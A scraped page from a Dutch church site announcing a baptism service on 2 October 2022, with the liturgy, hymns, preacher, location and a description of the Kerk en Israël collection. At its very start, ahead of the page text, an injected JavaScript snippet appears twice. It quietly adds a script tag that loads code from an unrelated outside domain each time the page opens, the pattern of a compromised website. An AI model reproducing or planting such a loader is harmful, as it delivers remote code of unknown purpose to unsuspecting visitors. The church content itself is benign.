;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 2 oktober 2022 9:30 uur - PKN Damwâld
zondag 2 oktober 2022
09:30 uur
Doopdienst

Kerkdienst zondag 2 oktober 2022 9:30 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Mededeling:Doopdienst
LivestreamDienst terugkijken
Bekijk op Youtube
Liturgie
Lied voor de dienst: NLB 150a:1,2 en 4
Welkomstwoord, Stil gebed, Votum en groet
We zingen: ELB 188 2X
Doopformulier
Bij binnenbrengen van Jorrit zingen we: Verbonden met vader en moeder
We zingen: Opwekking for Kids 185
Kinderen gaan naar de Blits
Gebed
We lezen: Hand. 8: 26 - 40
We zingen: NLB 87: 1, 2 en 3
Preek .
We zingen: NLB 139b:1 en 2
Dankgebed en voorbede
We zingen: ELB 195
Zegen
Collecte
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Uitganscollecte: Collecte Kerk in Actie Zending Kerk en Israël

Collecte Kerk in Actie 2022 – Kerk en Israël (collectenummer 22093)
De relatie met het volk Israël is voor de Protestantse Kerk een essentieel onderdeel van de eigen identiteit. De kerk voelt zich onopgeefbaar verbonden met Israël vanwege Gods geschiedenis met dit volk en de joodse wortels van ons christelijk geloof. Kernwoord in de relatie is gesprek en ontmoeting. Daarop zijn alle activiteiten van Kerk en Israël gericht. Het magazine Op weg laat mensen aan het woord die betekenis geven aan de joodse wortels voor geloven en kerk-zijn vandaag, en stimuleert aandacht voor de joodse achtergronden van de Bijbel en het geloofsgesprek in de gemeente. De handreiking ‘Onopgeefbaar Verbonden’ brengt mensen in plaatselijke gemeenten in gesprek over de onopgeefbare verbondenheid. Daarnaast zijn er de jaarlijkse ontmoetingsdagen Kerk en Israël en het internetproject ‘De Uitdaging’.
Met uw bijdrage aan de collecte maakt u deze activiteiten, gericht op ontmoeting en gesprek en op leren van de dialoog tussen joden en christenen, mogelijk. Om ons geloof levend te houden.